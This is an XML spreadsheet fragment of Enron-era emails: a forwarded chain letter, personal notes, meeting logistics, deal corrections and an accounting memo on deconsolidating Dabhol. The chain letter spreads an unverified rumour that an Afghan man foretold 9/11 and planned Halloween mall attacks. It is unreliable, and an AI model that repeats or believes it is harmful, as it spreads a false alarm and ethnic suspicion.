    <t>frozenset({'avant.jeff@enron.com', 'mckenzie.maggie@enron.com', 'beplay.celeste@enron.com', 'randis.bernadette@enron.com', 'hanselman.marge/dave@enron.com', 'elzerman.sandy@enron.com', 'steele.m.j.@enron.com', 'hughes.jim@enron.com', 'besthypnotist@enron.com', 'oliphant.christine@enron.com', 'richardson.rick@enron.com', 'foster.lea@enron.com', 'gauthier.dan@enron.com', 'heine.rita@enron.com', 'elliot.colleen@enron.com', 'cates.michelle@enron.com', 'gilmore.pam@enron.com', 'barnes.shelley@enron.com', 'rains.russell@enron.com', 'reyna.herlinda@enron.com', 'keith.kent@enron.com', 'schneider.dena@enron.com', 'hammett.rick@enron.com', 'draker.sheryl@enron.com', 'barasch.naomi@enron.com', 'sullivan.lana@enron.com', 'eric.botts@enron.com', 'cook.carlton@enron.com', 'landt.carol@enron.com', 'sheehan.susan@enron.com', 'glenn.read@enron.com', 'lavender.faith@enron.com', 'prestridge.pam@enron.com', 'martin.bill@enron.com', 'wisdom.mary@enron.com', 'stechschulte.paula@enron.com', 'levinson.saul@enron.com', 'buckner.brenda@enron.com', 'karn.kitty@enron.com', 'harrist.margaret@enron.com', 'vaughan.libbie@enron.com', 'gust.christine@enron.com', 'moses.ron@enron.com', 'leach.bill@enron.com', 'stein.madilyn@enron.com', 'kopacz.martin@enron.com', 'wisdom.ricky@enron.com', 'powers.pam@enron.com', 'khooshabi.geneva@enron.com', 'murphy.marie@enron.com', 'abrams.jeff@enron.com', 'work.dee@enron.com', 'jones.kathie@enron.com', 'spears.cindy@enron.com', 'fournet.michelle@enron.com', 'h..recknor@enron.com', 'lewis.martha@enron.com', 'burrough.pat@enron.com', 'warren.kemberley@enron.com', 'newman.michael@enron.com', 'chen.sherie@enron.com', 'baehr.kyra@enron.com', 'wassef.frances@enron.com', 'jennett.laura@enron.com', 'billeaud.philip@enron.com', 'carter.frieda@enron.com', 'ferazzi.anne@enron.com', 'nava.ann@enron.com', 'winston.leslie@enron.com', 'galligan.mary@enron.com', 'sellers.suzanne@enron.com', 'hanson.b.j.@enron.com', 'bonora.susan@enron.com', 'adams.sherry@enron.com', 'elizabeth.sager@enron.com', 'powers.betty@enron.com', 'wilkinson.mary@enron.com', 'formal.genies@enron.com', 'sampson.christine@enron.com', 'tait.cynthia@enron.com', 'salinas.mari@enron.com', 'stripling.dana@enron.com', 'ainbinder.maria@enron.com', 'makris.elaine@enron.com', 'shen.donna@enron.com', 'hayes.debra@enron.com'})</t>
  </si>
  <si>
    <t>IS IT POSSIBLE</t>
  </si>
  <si>
    <t>I don't know if this is true, but on the chance that it is, wanted to send_x000D_
this to you . . . ._x000D_
_x000D_
_x000D_
&gt; In a message dated 10/10/01 2:57:28 PM Mountain Daylight Time,_x000D_
&gt; Skycap8183@aol.com writes:_x000D_
&gt;_x000D_
&gt; &lt;&lt; &gt; cc:_x000D_
&gt;  &gt; Subject:  FW: Malls on 10/31_x000D_
&gt;  &gt;_x000D_
&gt;  &gt; It's so sad that I feel like I need to send_x000D_
&gt;  &gt; out a precautionary email like_x000D_
&gt;  &gt; this without any real proof that this is even a concern.  But, better_x000D_
safe_x000D_
&gt;  &gt; than sorry..._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;_x000D_
&gt;  &gt; Hi All -_x000D_
&gt;  &gt;_x000D_
&gt;  &gt; I think you all know that I don't send out_x000D_
&gt;  &gt; hoaxes and don't do the_x000D_
&gt;  &gt; reactionary thing and send out anything that_x000D_
&gt;  &gt; crosses my path.  This one,_x000D_
&gt;  &gt; however, is a friend of a friend and I've_x000D_
&gt;  &gt; given it enough credibility in_x000D_
&gt;  &gt; my mind that I'm writing it up and sending_x000D_
&gt;  &gt; it out to all of you._x000D_
&gt;  &gt;_x000D_
&gt;  &gt; My friend's friend was dating a guy from Afghanistan_x000D_
&gt;  &gt; up until a month ago._x000D_
&gt;  &gt; She had a date with him around 9/6 and was stood up._x000D_
&gt;  &gt;  She was_x000D_
&gt;  &gt; understandably upset and went to his home to find it_x000D_
&gt;  &gt; completely emptied._x000D_
&gt;  &gt; On 9/10, she received a letter from her boyfriend_x000D_
&gt;  &gt; explaining that he_x000D_
&gt;  &gt; wished he could tell her why he had left and that_x000D_
&gt;  &gt;  he was sorry it had to_x000D_
&gt;  &gt; be like that.  The part worth mentioning is that he_x000D_
&gt;  &gt; BEGGED her not_x000D_
&gt;  &gt; to geton any commercial airlines on 9/11 and to not_x000D_
&gt;  &gt; to go any malls on_x000D_
&gt;  &gt; Halloween.  As soon as everything happened on the_x000D_
&gt;  &gt; 11th, she called_x000D_
&gt;  &gt; the FBI and has since turned over the letter._x000D_
&gt;  &gt;_x000D_
&gt;  &gt; This is not an email that I've received and_x000D_
&gt;  &gt; decided to pass on. This came_x000D_
&gt;  &gt; from a phone conversation with a long-time_x000D_
&gt;  &gt;  friend of mine last_x000D_
&gt;  &gt; night._x000D_
&gt;  &gt;_x000D_
&gt;  &gt; I may be wrong, and I hope I am.  However,_x000D_
&gt;  &gt; with one of his warnings being_x000D_
&gt;  &gt; correct and devastating, I'm not willing to_x000D_
&gt;  &gt; take the chance on the_x000D_
&gt;  &gt; second and wanted to make sure that people I_x000D_
&gt;  &gt; cared about had the same_x000D_
&gt;  &gt; information that I did._x000D_
&gt;  &gt;_x000D_
&gt;  &gt; Laura Katsis_x000D_
&gt;  &gt; Implementation Specialist_x000D_
&gt;  &gt; 714/921-5424_x000D_
&gt;  &gt; katsis@volt.com_x000D_
&gt;  &gt; OpsVolt_Track@volt.com_x000D_
&gt;  &gt;  &gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
Return-path: &lt;Skycap8183@aol.com&gt;_x000D_
From: Skycap8183@aol.com_x000D_
Full-name: Skycap8183_x000D_
Message-ID: &lt;74.1166bb38.28f61038@aol.com&gt;_x000D_
Date: Wed, 10 Oct 2001 16:57:28 EDT_x000D_
Subject: Fwd: FW: IS IT POSSIBLE_x000D_
To: KAMAREE0413@aol.com, SteveandPach@cs.com, HEVVA@aol.com, JBeatonjr@aol.com,	mrsanni_93@yahoo.com, MsLTunya1@cs.com, bflyconsulting@yahoo.com,	echilds@ohgolly.com, ediane@worldnet.att.net_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary="part3_9e.1ba6790f.28f61038_boundary"_x000D_
X-Mailer: AOL 6.0 for Windows US sub 10540_x000D_
_x000D_
_x000D_
_x000D_
Return-Path: &lt;srutland@harris.com&gt;_x000D_
Received: from  rly-yh04.mx.aol.com (rly-yh04.mail.aol.com [172.18.147.36]) by air-yh01.mail.aol.com (v81.9) with ESMTP id MAILINYH13-1010151746; Wed, 10 Oct 2001 15:17:46 -0400_x000D_
Received: from  mlbmx2.corp.harris.com (mlbmx2.corp.harris.com [137.237.90.74]) by rly-yh04.mx.aol.com (v81.9) with ESMTP id MAILRELAYINYH46-1010151717; Wed, 10 Oct 2001 15:17:17 -0400_x000D_
Received: by mlbmx2.corp.harris.com with Internet Mail Service (5.5.2653.19)	id &lt;4CRZ600A&gt;; Wed, 10 Oct 2001 15:17:01 -0400_x000D_
Message-ID: &lt;BFE302C4DFC0D11195C000805F19DC4D0C4E04FE@corpmx4.ess.harris.com&gt;_x000D_
From: "Rutland, Sidney" &lt;srutland@harris.com&gt;_x000D_
To: "'skycap8183@aol.com'" &lt;skycap8183@aol.com&gt;,        "Horne, Sazana"	 &lt;shorne@harris.com&gt;,        "Terry, Anita" &lt;aterry01@harris.com&gt;,        "Smith, Leroy" &lt;lsmith17@harris.com&gt;,        "Walker, David"	 &lt;dwalker@harris.com&gt;_x000D_
Subject: FW: IS IT POSSIBLE_x000D_
Date: Wed, 10 Oct 2001 15:17:10 -0400_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2653.19)_x000D_
Content-Type: text/plain;	charset="iso-8859-1"_x000D_
_x000D_
_x000D_
        PASS IT ON_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Minus, James_x000D_
&gt; Sent: Wednesday, October 10, 2001 1:58 PM_x000D_
&gt; To:   Minus, James; Minus, Yvonne; Rutland, Sidney; Snyder, Jonathan; Smith,_x000D_
&gt; Demetrius; Charland, Thomas; Ratteray, Calvin_x000D_
&gt; Subject:  FW: IS IT POSSIBLE_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Leyba, Geoffrey_x000D_
&gt; Sent: Wednesday, October 10, 2001 1:35 PM_x000D_
&gt; To:   Thrash, Roselyn; Fanus, Jeanette; Butz, Brenda; Hicks, Kathy; Orischak,_x000D_
&gt; Rachel; King, Judy; Crawford, Katie; Willingham, Jody; Williams, A Lois;_x000D_
&gt; Jameson, Lois; Cobb, Bette; Sikes, Steven; Tran, Tuyet; Wagner, H L Lore;_x000D_
&gt; Hall, Naima; Schmidt, Angela; Wynn, Shirley; Pompey, Sharon; Byars, Sondra;_x000D_
&gt; Wilden, Brenda; Byron, James; Rogachesky, Jill; Minus, James;_x000D_
&gt; 'allen.lytle@lmco.com'; McKeown, J Kevin; Needham, Mark; Clark, Carolyn;_x000D_
&gt; DeSpain, Carol_x000D_
&gt; Subject:  FW: IS IT POSSIBLE_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Not sure how true this is, but felt it was worth sending just in case there is_x000D_
&gt; some truth to it._x000D_
&gt;_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:     Swartley, Deborah_x000D_
&gt; Sent: Wednesday, October 10, 2001 1:20 PM_x000D_
&gt; Subject:  IS IT POSSIBLE_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Folks,_x000D_
&gt;_x000D_
&gt; Don't know how true or false this is. But, at this_x000D_
&gt; juncture anything is possible._x000D_
&gt; Forwarded by Andre K Ballard/Frito-Lay/US on 10/09/2001_x000D_
&gt; 02:02 PM -----------------_x000D_
&gt;_x000D_
&gt; To:_x000D_
&gt; cc:_x000D_
&gt; Subject:  FW: Malls on 10/31_x000D_
&gt;_x000D_
&gt; It's so sad that I feel like I need to send_x000D_
&gt; out a precautionary email like_x000D_
&gt; this without any real proof that this is even a concern.  But, better safe_x000D_
&gt; than sorry..._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Hi All -_x000D_
&gt;_x000D_
&gt; I think you all know that I don't send out_x000D_
&gt; hoaxes and don't do the_x000D_
&gt; reactionary thing and send out anything that_x000D_
&gt; crosses my path.  This one,_x000D_
&gt; however, is a friend of a friend and I've_x000D_
&gt; given it enough credibility in_x000D_
&gt; my mind that I'm writing it up and sending_x000D_
&gt; it out to all of you._x000D_
&gt;_x000D_
&gt; My friend's friend was dating a guy from Afghanistan_x000D_
&gt; up until a month ago._x000D_
&gt; She had a date with him around 9/6 and was stood up._x000D_
&gt;  She was_x000D_
&gt; understandably upset and went to his home to find it_x000D_
&gt; completely emptied._x000D_
&gt; On 9/10, she received a letter from her boyfriend_x000D_
&gt; explaining that he_x000D_
&gt; wished he could tell her why he had left and that_x000D_
&gt;  he was sorry it had to_x000D_
&gt; be like that.  The part worth mentioning is that he_x000D_
&gt; BEGGED her not_x000D_
&gt; to geton any commercial airlines on 9/11 and to not_x000D_
&gt; to go any malls on_x000D_
&gt; Halloween.  As soon as everything happened on the_x000D_
&gt; 11th, she called_x000D_
&gt; the FBI and has since turned over the letter._x000D_
&gt;_x000D_
&gt; This is not an email that I've received and_x000D_
&gt; decided to pass on. This came_x000D_
&gt; from a phone conversation with a long-time_x000D_
&gt;  friend of mine last_x000D_
&gt; night._x000D_
&gt;_x000D_
&gt; I may be wrong, and I hope I am.  However,_x000D_
&gt; with one of his warnings being_x000D_
&gt; correct and devastating, I'm not willing to_x000D_
&gt; take the chance on the_x000D_
&gt; second and wanted to make sure that people I_x000D_
&gt; cared about had the same_x000D_
&gt; information that I did._x000D_
&gt;_x000D_
&gt; Laura Katsis_x000D_
&gt; Implementation Specialist_x000D_
&gt; 714/921-5424_x000D_
&gt; katsis@volt.com_x000D_
&gt; OpsVolt_Track@volt.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 06:39:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hi beautiful. I had a hard time yesterday because I missed you so much (in case you couldn't tell). The more we are together the more I love you and want to spend all my time with you. I can't wait to see you._x000D_
_x000D_
Stan's staff meeting was cancelled so I am just trying to catch up on things this morning._x000D_
_x000D_
Love you sweetie.</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 04:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Here I was thinking of a fun nice restaurant for dinner tomorrow and then _x000D_
wham the gloves come off.  Well Ms Spears get ready to bring on the wit _x000D_
tomorrow at dinner. I will check into buying the ticket and you realize this _x000D_
puts you in the pick up position at the airport.  Thanks for the tip._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
07/25/2000 10:09 AM_x000D_
To: Ted Noble/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Hey Bo,_x000D_
_x000D_
I was checking on some flights for myself and happened to look at one-way _x000D_
tickets from New Orleans.  It looks like the refundable, no-advance purchase _x000D_
ticket is going to run you about $100 on Southwest...Lucky for you they do _x000D_
offer a senior citizen fare for $55 (age does have its advantages)._x000D_
_x000D_
Sissy_x000D_
_x000D_
By the way,  I didn't  even realise John Cleese and Denise Richards were in _x000D_
the movie...and evidently at some point Bond hijacks a submarine.  Roger _x000D_
Ebert actually thought so much of the film he gave it 3 and 1/2 stars.  We _x000D_
may have to watch this one at some point._x000D_
_x000D_
              "The World Is Not Enough" is a splendid comic thriller, _x000D_
exciting and graceful,_x000D_
               endlessly inventive. Because it is also the 19th James Bond _x000D_
movie, it comes with so_x000D_
               much history that one reviews it like wine, comparing it to _x000D_
earlier famous vintages; I_x000D_
               guess that's part of the fun. This is a good one._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 18:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lauren.schlesinger@enron.com'})</t>
  </si>
  <si>
    <t>Re: w/ elec utility</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the help!_x000D_
_x000D_
_x000D_
_x000D_
From:	Lauren Schlesinger/ENRON@enronXgate on 04/17/2001 03:49 PM_x000D_
To:	Susan M Scott/HOU/ECT@ECT_x000D_
cc:	 _x000D_
Subject:	w/ elec utility_x000D_
_x000D_
Here you go, with the electric utility..._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 09:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/09/2001 _x000D_
05:02 PM ---------------------------_x000D_
_x000D_
_x000D_
"MacMillan, Ian" &lt;macmilli@wharton.upenn.edu&gt; on 03/08/2001 01:47:27 PM_x000D_
To: "'Vince.J.Kaminski@enron.com'" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: Lawyer_x000D_
_x000D_
_x000D_
I will sign an agreement not to use the materials_x000D_
_x000D_
-----Original Message-----_x000D_
From: Vince.J.Kaminski@enron.com [mailto:Vince.J.Kaminski@enron.com]_x000D_
Sent: Thursday, March 08, 2001 11:13 AM_x000D_
To: macmilli@wharton.upenn.edu_x000D_
Cc: Vince.J.Kaminski@enron.com_x000D_
Subject: Re: Lawyer_x000D_
_x000D_
_x000D_
_x000D_
Ian,_x000D_
_x000D_
Sorry for a delay in getting back to you._x000D_
I have one challenge I did not anticipate_x000D_
when I talked to you  the first time about our Real Options_x000D_
internal seminar._x000D_
_x000D_
The materials were prepared in collaboration with a professor_x000D_
from another school, and there is some  sensitivity regarding_x000D_
the intellectual property rights and the ability to distribute the_x000D_
materials_x000D_
outside Enron._x000D_
_x000D_
Please, give me some time to find out if I can work_x000D_
around this issue._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"MacMillan, Ian" &lt;macmilli@wharton.upenn.edu&gt; on 03/07/2001 06:46:28 AM_x000D_
_x000D_
To:   "'Vince.J.Kaminski@enron.com'" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:_x000D_
Subject:  Lawyer_x000D_
_x000D_
_x000D_
I still have not heard from your lawyer.  I would like to see whar_x000D_
materials you are using and assess how we could work on the topic of real_x000D_
options with Enron_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 15:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Post Interview Meeting - Decision Making Meeting</t>
  </si>
  <si>
    <t>Yes, sir.  Do you have anyone from your group or someone you know who can interview._x000D_
_x000D_
Thanks -=- Paul L._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Mcgowan, Kevin  _x000D_
Sent:	Friday, October 26, 2001 4:07 PM_x000D_
To:	Lebeau, Paul_x000D_
Subject:	RE: Post Interview Meeting - Decision Making Meeting_x000D_
_x000D_
I may not be able to go on the recruiting trip due to urgent business matters.  Will this completely screw you up?_x000D_
_x000D_
KJM_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lebeau, Paul  _x000D_
Sent:	Friday, October 26, 2001 11:47 AM_x000D_
To:	Marvin, Michele Nezi; Betzer, Evan; Bassis, Betsy; Desai, Jayshree; Sun, Li; Lindvall, Tim; Mcgowan, Kevin; Enerson, John; Ward, Charles; Dutt, Ranabir_x000D_
Cc:	Herasimchuk, Alyse_x000D_
Subject:	Post Interview Meeting - Decision Making Meeting_x000D_
_x000D_
Hello Interview Team:_x000D_
_x000D_
We are planning on meeting on October 31st at 10am in 35C2 to discuss our choices for SuperSaturday.  Please RSVP for the meeting._x000D_
_x000D_
Thanks/Paul LeBeau</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 13:02:12 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carol.howes@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'bruce.lundstrom@enron.com', 'robert.mathis@enron.com', 'rodney.faldyn@enron.com', 'bob.butts@enron.com', 'rob.walls@enron.com', 'wade.cline@enron.com', 'a..hughes@enron.com', 'rod.hayslett@enron.com', 'richard.causey@enron.com', 'e..sommers@enron.com'})</t>
  </si>
  <si>
    <t>FW: Deconsolidation of Dabhol if Enron's shares are increased to_x000D_
 65%</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
FYI -_x000D_
_x000D_
Bechtel has requested that the agenda for the DPC board meeting next week include a vote to issue the Phase II shares.  Once the shares are issued, Enron will have 65% voting rights and will be able to control the matters which require majority consents (the memo attached below contains a summary of such matters)._x000D_
_x000D_
Mary Cilia and I had worked with Mike Jones (AA) on this a few months ago and he had agreed that we could avoid consolidation of DPC by entering into a legally binding side letter with GE and Bechtel waiving our majority consent rights and agreeing to vote as a block with them on such matters.  AA's concurrence is subject to their review the side letter and confirmation that it is legally binding._x000D_
_x000D_
Jeff Sommers and I are scheduling a meeting with Mike Jones for tomorrow to ensure that the previously reached conclusion still stands._x000D_
 -----Original Message-----_x000D_
From: 	Cilia, Mary  _x000D_
Sent:	Tuesday, May 22, 2001 7:37 PM_x000D_
To:	Causey, Richard; Butts, Bob; Colwell, Wes; Faldyn, Rodney; Sommers, Jeffrey E.; Howes, Carol; 'michael.d.jones@us.arthurandersen.com'; 'david.b.duncan@us.arthurandersen.com'_x000D_
Subject:	Deconsolidation of Dabhol if Enron's shares are increased to 65%_x000D_
_x000D_
To All -_x000D_
_x000D_
Attached is the memo documenting our conclusion on the continued deconsolidation of Dabhol if Dabhol Power Company were to issue the Phase II shares that the investors are currently entitled to.  Such an issuance would increase Enron's interest in the company to approximately 65%.  In short, as long as Enron waives its majority consent abilities in a legally binding side letter with GE and Bechtel, we would not have to consolidate Dabhol.  If you have any questions, please don't hesitate to respond.  Thanks._x000D_
_x000D_
Mary_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 09:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wholesale Market</t>
  </si>
  <si>
    <t xml:space="preserve">Margaret asked me to send these to you for your use in California_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 06:37:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nicola.beales@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'t..hodge@enron.com'})</t>
  </si>
  <si>
    <t>RE: European Trading Meeting</t>
  </si>
  <si>
    <t>No problem.  Thanks Jeff. _x000D_
_x000D_
Nicola_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hodge, Jeffrey T.  _x000D_
Sent:	23 October 2001 14:34_x000D_
To:	Beales, Nicola_x000D_
Cc:	Taylor, Mark E (Legal); Rosell, Martin_x000D_
Subject:	RE: European Trading Meeting_x000D_
_x000D_
Nicola:_x000D_
_x000D_
In follow-up to our telephone conversation, today's meeting is cancelled.  Could you advise everyone at your end?  The next meeting will be 2 weeks from today.  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jeff_x000D_
 -----Original Message-----_x000D_
From: 	Beales, Nicola  _x000D_
Sent:	Tuesday, October 23, 2001 6:26 AM_x000D_
To:	Hodge, Jeffrey T._x000D_
Subject:	European Trading Meeting_x000D_
_x000D_
Jeff, _x000D_
_x000D_
I just wanted to check whether the Trading Meeting was actually taking place today (Justin wondered whether it would be cancelled as you have the All-Employee Meeting). _x000D_
_x000D_
Hope you are well. _x000D_
_x000D_
Kind regards, _x000D_
Nicola</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 13:43:01 -0800 (PST)</t>
  </si>
  <si>
    <t>I'll email him again. _x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
Sent: Mon Nov 19 15:41:16 2001_x000D_
Subject: RE: _x000D_
_x000D_
I understand.  I am not the one holding you up.  I printed out both documents for him to read.  John doesn't take commands from me.  I will make any revisions he has made on his printed copies tomorrow._x000D_
_x000D_
-----Original Message-----_x000D_
From: Woods, Trevor _x000D_
Sent: Monday, November 19, 2001 3:28 PM_x000D_
To: Taylor, Michael E_x000D_
Subject: RE: _x000D_
_x000D_
_x000D_
I want the next rev done before Monday so I can go from there. _x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
Sent: Mon Nov 19 15:12:37 2001_x000D_
Subject: RE: _x000D_
_x000D_
I think he looked at the preso and maybe 25% of the b-plan.  We did not talk about it, yet.  He said it looked good, but he got bored so he stopped reading.  He may be waiting for you to come back in town to discuss.  I told him you would be back Monday.  That is the latest.    _x000D_
_x000D_
-----Original Message-----_x000D_
From: Woods, Trevor _x000D_
Sent: Monday, November 19, 2001 3:06 PM_x000D_
To: Taylor, Michael E_x000D_
Subject: RE: _x000D_
_x000D_
_x000D_
You two go over the bplan?_x000D_
 Trevor Woods_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Taylor, Michael E &lt;Michael.E.Taylor@ENRON.com&gt;_x000D_
To: Woods, Trevor &lt;Trevor.Woods@ENRON.com&gt;_x000D_
Sent: Mon Nov 19 14:59:29 2001_x000D_
Subject: RE: _x000D_
_x000D_
done_x000D_
_x000D_
	 -----Original Message-----_x000D_
	From: 	Woods, Trevor  _x000D_
	Sent:	Friday, November 16, 2001 3:19 PM_x000D_
	To:	Taylor, Michael E_x000D_
	Subject:	_x000D_
_x000D_
	we're gonna need a table of contents on the b plan in addition to the printed version</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 05:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'angie.zeman@enron.com', 'beverly.beaty@enron.com'})</t>
  </si>
  <si>
    <t>CNG Fuel Waivers</t>
  </si>
  <si>
    <t>Hey Z, would you show Beavy how to request the CNG Fuel waivers for July?  I _x000D_
want Beavy to do it for a couple of months so she will be aware of our _x000D_
operational flexibility._x000D_
_x000D_
Remember, you need to keep track of all of this on your 2000 accomplishments _x000D_
for your year end review._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 06:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Thought this might be useful for you to have as well. I highlighted the deal _x000D_
numbers that concern your desk in red. I know these are really nitpicky _x000D_
errors, but it might be worth reminding these guys of the correct _x000D_
counterparty names._x000D_
_x000D_
Kate_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 01/30/2001 02:54 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
01/30/2001 09:14 AM_x000D_
To: Joe Errigo/Corp/Enron@Enron, Geir Solberg/PDX/ECT@ECT, Juan _x000D_
Hernandez/Corp/Enron@ENRON, Leaf Harasin/PDX/ECT@ECT, Ryan _x000D_
Slinger/PDX/ECT@ECT, David V Porter/PDX/ECT@ECT_x000D_
cc: Kate Symes/PDX/ECT@ECT _x000D_
_x000D_
Subject: Incorrect Counterparties_x000D_
_x000D_
I have changed the following deals b/c the selected CPs are incorrect.  Also, _x000D_
please remember not to pick CPs in brackets as they are inactive.  Thank you _x000D_
for your help._x000D_
_x000D_
507901 should be Allegheny Power, Transmission Business Unit_x000D_
507842 should be Dynegy Power Marketing, Inc. - MARK GUZMAN (changed from _x000D_
Dynegy Marketing &amp; Trade)_x000D_
506767 should be NRG Power Marketing, Inc._x000D_
507900 should be PJM Interconnection LLC_x000D_
506618 should beTransalta Energy Marketing (US) Inc. - LEIF HARASIN (changed _x000D_
from Transalta Energy Marketing Corp.)_x000D_
506727 should beTransalta Energy Marketing (US) Inc. - RYAN SLINGER (changed _x000D_
from Transalta Energy Marketing Corp.)_x000D_
506747 should beTransalta Energy Marketing (US) Inc. - DAVID PORTER (changed _x000D_
from Transalta Energy Marketing Corp.)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 01:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the presentation I used for a very general update on _x000D_
deregulation; it includes some California material._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 00:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'valerie.petersen@yale.edu'})</t>
  </si>
  <si>
    <t>FW: Panel on Valuation</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----_x000D_
&gt; From: Garten, Jeffrey_x000D_
&gt; Sent: Monday, November 06, 2000 12:55 PM_x000D_
&gt; To: 'Len@shv.com'_x000D_
&gt; Subject: FW: Panel on Valuation_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Garten, Jeffrey_x000D_
&gt; Sent: Monday, November 06, 2000 12:48 PM_x000D_
&gt; To: 'Len@shv.com'; 'jdoerr@kpcb.com'; 'robg@real.com';_x000D_
&gt; 'larry_kanarek@mckinsey.com'; 'HHK@sprintmail.com';_x000D_
&gt; 'kenneth.lay@enron.com'; 'blev@stern.nyu.edu'; 'jbneff@wellmanage.com';_x000D_
&gt; 'nperetsman@allenco.com'; 'hadlow@blackstone.com';_x000D_
&gt; 'carlsonl@blackstone.com'; 'depowell@cisco.com';_x000D_
&gt; 'David.L.Shedlarz@pfizer.com'; 'rick.sherlund@gs.com';_x000D_
&gt; 'jstiglitz@brookings.edu'; 'Hal@sims.berkeley.edu'_x000D_
&gt; Cc: 'tim_koller@mckinsey.com''; 'avalles@kpcb.com'; 'Lliming@real.com';_x000D_
&gt; 'jeanne_giles@mckinsey.com'; 'rosalee.fleming@enron.com';_x000D_
&gt; 'kboles@allenco.com'; 'dryan@cisco.com'; 'jfielding@gs.com';_x000D_
&gt; 'tmerkle@brook.edu'; 'lucy@sims.berkeley.edu';_x000D_
&gt; 'carolyn_hubbard@mckinsey.com'; Petersen, Valerie_x000D_
&gt; Subject: Panel on Valuation_x000D_
&gt;_x000D_
&gt; Since the overwhelming majority of you can participate in a conference_x000D_
&gt; call on Monday November 20 at 5 p.m. EST, we suggest locking that in now._x000D_
&gt; So please put it on your schedule._x000D_
&gt;_x000D_
&gt; The dial-in number will be:  1-888-622-5357; participant code 550894._x000D_
&gt;_x000D_
&gt; I will only need your comments in advance if you cannot attend the_x000D_
&gt; teleconference on the 20th.  If you cannot attend, please contact Valerie_x000D_
&gt; Petersen at 203-432-6035 to set up a time for a pre-conference call_x000D_
&gt; between the two of us.  You may also get your comments to me in writing._x000D_
&gt;_x000D_
&gt; Best,_x000D_
&gt; Jeff</t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 09:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Transco Sims deal</t>
  </si>
  <si>
    <t>Check out how I entered deal 289172, the final prices are $4.415, $4.435, _x000D_
$4.455, and $4.475._x000D_
_x000D_
Comment?</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 07:39:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ENE</t>
  </si>
  <si>
    <t>YES,  IM 100% IN ENE._x000D_
ITS GOING TO BE UP AROUND $2.50 TODAY SO THAT ITS NOT AN EASY DECISION TO STAY IN OR GET OUT!_x000D_
WHAT DO YOU WANT TO BET!_x000D_
_x000D_
